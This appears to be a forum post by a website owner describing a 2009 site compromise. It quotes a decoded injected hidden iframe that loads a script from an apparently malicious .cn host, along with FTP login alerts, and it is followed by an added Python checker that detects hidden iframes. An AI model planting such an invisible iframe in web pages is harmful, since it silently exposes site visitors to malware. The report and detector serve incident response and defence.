This is the first code that was injected on my sites: (decoded version)
Code:
<iframe width="480" height="60" src="http://download-123.cn/vtiadmin2/t.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>
The FTP logs:
Quote:
CyberWurx login monitoring has detected the following account login from a new internet segment:
Date: Sat May 9 05:24:25 2009
FTP Logged in from:
Country: United States
Internet segment: 65.64.0.0/13
Internet Service Provider: SBIS-AS - SBC Internet Services
Quote:
CyberWurx login monitoring has detected the following account login from a new internet segment:
Date: Sun May 10 23:54:24 2009
FTP Logged in from:
Country: Germany
Internet segment: 81.169.144.0/20
Internet Service Provider: STRATO Strato AG
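A defensive check for this kind of injection, added here as an example and not part of the original post: it parses a page and flags iframes whose inline style uses the hiding tricks visible in the injected snippet (zero opacity, the IE alpha filter, a negative offset). The function name, rule names and sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Hiding tricks present in the injected iframe quoted in the post, plus two common variants.
HIDING_RULES = {
    "zero opacity": re.compile(r"opacity\s*:\s*0(?:\.0+)?\s*(?:;|$)", re.I),
    "IE alpha filter at 0": re.compile(r"alpha\(\s*opacity\s*=\s*0\s*\)", re.I),
    "negative offset": re.compile(r"(?:left|top)\s*:\s*-\d+", re.I),
    "display/visibility hidden": re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I),
}

class IframeAuditor(HTMLParser):
    """Collects iframes whose attributes make them invisible to a visitor."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attr = {name: (value or "") for name, value in attrs}
        style = attr.get("style", "")
        reasons = [name for name, rule in HIDING_RULES.items() if rule.search(style)]
        if attr.get("width") in ("0", "1") or attr.get("height") in ("0", "1"):
            reasons.append("0/1 pixel size")
        if reasons:
            line = self.getpos()[0]  # 1-based line of the opening tag
            self.findings.append({"line": line, "src": attr.get("src", ""), "reasons": reasons})

def find_hidden_iframes(html):
    """Return one finding per hidden iframe in the given HTML text."""
    auditor = IframeAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings

# Constructed sample: one ordinary embed and one iframe styled like the injected one.
# Both hostnames are placeholders under the reserved .invalid TLD.
SAMPLE_PAGE = """<html><body>
<iframe width="560" height="315" src="https://video.example.invalid/embed/1" style="border:0"></iframe>
<p>Welcome</p>
<iframe width="480" height="60" src="http://injected.example.invalid/t.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE_PAGE):
        print(finding["line"], finding["src"], ", ".join(finding["reasons"]))
```

Run over every file in the web root after an incident, this only finds iframes written as plain HTML; an injection that is encoded, as the original one here was before decoding, needs the decoded text as input.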